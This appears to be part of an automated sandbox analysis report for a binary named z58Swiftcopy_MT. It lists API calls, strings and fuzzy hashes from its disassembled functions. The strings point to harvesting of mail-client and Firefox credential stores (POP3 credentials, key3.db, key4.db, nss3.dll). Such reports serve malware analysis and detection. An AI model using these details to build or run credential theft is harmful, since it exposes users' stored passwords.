                                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                                                                      • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                                                                      • API String ID: 524865279-2190619648
                                                                                                                                                                                                                                      • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                                                                                                                                      • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406BFF
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406C0D
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                                                                                      • String ID: key3.db$key4.db
                                                                                                                                                                                                                                      • API String ID: 581844971-3557030128
                                                                                                                                                                                                                                      • Opcode ID: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                                                                                                                                                                                                                      • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                                                                                      • API String ID: 2300387033-3849865405
                                                                                                                                                                                                                                      • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                                                                                                                                      • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004076D7
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407710
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407733
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                                                                      • String ID: %s (%s)
                                                                                                                                                                                                                                      • API String ID: 3756086014-1363028141
                                                                                                                                                                                                                                      • Opcode ID: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                                                                                                                                      • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                                                                      • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                                                                                                                                      • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                                                                      • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                                                                      • API String ID: 1640410171-3316789007
                                                                                                                                                                                                                                      • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                                                                                                                                      • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                                                                                                      • API String ID: 125969286-791839006
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                                                                                                                                        • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                                                                                                                                        • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                                                                        • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                                                                                                                                        • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                                                                        • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                                                                        • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                                                                        • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                                                                      • String ID: ACD
                                                                                                                                                                                                                                      • API String ID: 1886237854-620537770
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004091EC
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00409201
                                                                                                                                                                                                                                        • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                                                                                                                                        • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                                                                        • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                                                                                                                                      • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                                                                                                      • String ID: caption$dialog_%d
                                                                                                                                                                                                                                      • API String ID: 2923679083-4161923789
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • no such savepoint: %s, xrefs: 00426A02
                                                                                                                                                                                                                                      • unknown error, xrefs: 004277B2
                                                                                                                                                                                                                                      • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                                                                                                                                      • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                                                                                                                                      • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                                                                                                                                      • API String ID: 3510742995-3035234601
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                                      • API String ID: 2221118986-3608744896
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                                                                                                                                                                        • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmpmemcpy
                                                                                                                                                                                                                                      • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                                                                                      • API String ID: 1784268899-4153596280
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410246
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410258
                                                                                                                                                                                                                                        • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041033F
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3974772901-0
                                                                                                                                                                                                                                      • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                                                                                                                                                      • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                                                                        • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                                                                                                        • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 577244452-0
                                                                                                                                                                                                                                      • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                                                                                                                                      • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                                                                      • String ID: imap$pop3$smtp
                                                                                                                                                                                                                                      • API String ID: 2025310588-821077329
                                                                                                                                                                                                                                      • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                                                                                                                                      • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C02D
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,762D0A60), ref: 00408EBE
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,762D0A60), ref: 00408E31
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                                        • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                                                                                                        • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                                                                        • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                                      • API String ID: 2726666094-3614832568
                                                                                                                                                                                                                                      • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                                                                                                                                      • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403A88
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403AA1
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403AE9
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
